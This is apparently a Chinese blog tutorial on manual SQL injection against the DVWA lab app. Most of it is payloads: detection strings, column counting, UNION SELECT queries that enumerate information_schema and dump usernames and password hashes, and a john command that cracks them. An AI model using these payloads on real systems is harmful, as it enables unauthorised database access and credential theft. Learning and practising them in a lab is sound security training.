-
Web渗透_SQL注入1
SQL注入
-
服务器端程序将用户输入参数作为查询条件,直接拼接SQL语句,并将查询结果返回给客户端浏览器;
-
基于报错的检测方式
' " % ()- 1
-
基于布尔的检测
-
1’and’1’='1 / 1’and’1
-
1’and’1’='2 / 1’and’0
-
通过真假去判断是否存在SQL注入
检测查询字段
-
表列数/显示信息位于哪一列
-
'order by 9–(–后面加个空格) #按查询列号排序(注释符:–)
-
select * 时表字段数=查询字段数
- 慢慢减少数字,直到不报错为止
联合查询
-
'union select 1,2-- (–后面加个空格) ##查询哪个是第一个字段哪个是第二个字段
-
'union all select database(),2-- (–后面加个空格)
-
当然,我们可以去替换字段去查询一些敏感信息
-
'union select user(),version()–
- 除此之外,还可以替换成其他的全局参数
@@datadir #当前数据库所在位置 @@hostname #查询当前主机名 @@VERSION #查询数据库版本 @@version_compile_os-- #查询操作系统 CHAR() #执行ACSII码转换 md5() #计算哈希值- 1
- 2
- 3
- 4
- 5
- 6
-
连接字符串
-
CONCAT_WS(CHAR(32,58,32),user(),database(),version())
注:这个插件叫hackbar,自己去搜下如何使用
查询所有表 / 所有库
- 'union select table_name,table_schema from information_schema.tables-- ’
统计库中表的数量
- 'UNION select table_schema,count(*) FROM information_Schema.tables group by table_schema –
Dvwa库中的表名
'union select table_name,table_schema from information_schema.tables where table_schema='dvwa' --+ (+代表空格)- 1
查询Users表中所有列
'union select table_name,column_name from information_schema.columns where table_schema='dvwa' and table_name='users'--+ (+代表空格)- 1
查询user、password列中的内容
'union select user,password from dvwa.users--+ (+代表空格)- 1
'union select null,concat(user,0x3a,password) from users--+- 1
- 之后将用户名和密码保存下来
- 之后 去破解密码
john --format=raw-MD5 dvwa.txt- 1
-
-
相关阅读:
【数据结构与算法】图的基本概念
Julia绘图初步:Plots
第十五篇-推荐-Huggingface-镜像-2023-10
数据结构与算法 | 第一章:概论
二次封装 Spring Data JPA/MongoDB,打造更易用的数据访问层
PAT 1029 Median(25分)
如何加快Chrome谷歌浏览器下载速度?
强大的JTAG边界扫描(2):BSDL文件介绍
2、Mybatis框架的添加功能(Mybatis是面向接口编程,要先有接口)
spring5.0源码解析 从源码角度分析 advice 的执行顺序 aop 05
- 原文地址:https://blog.csdn.net/weixin_42952508/article/details/126105684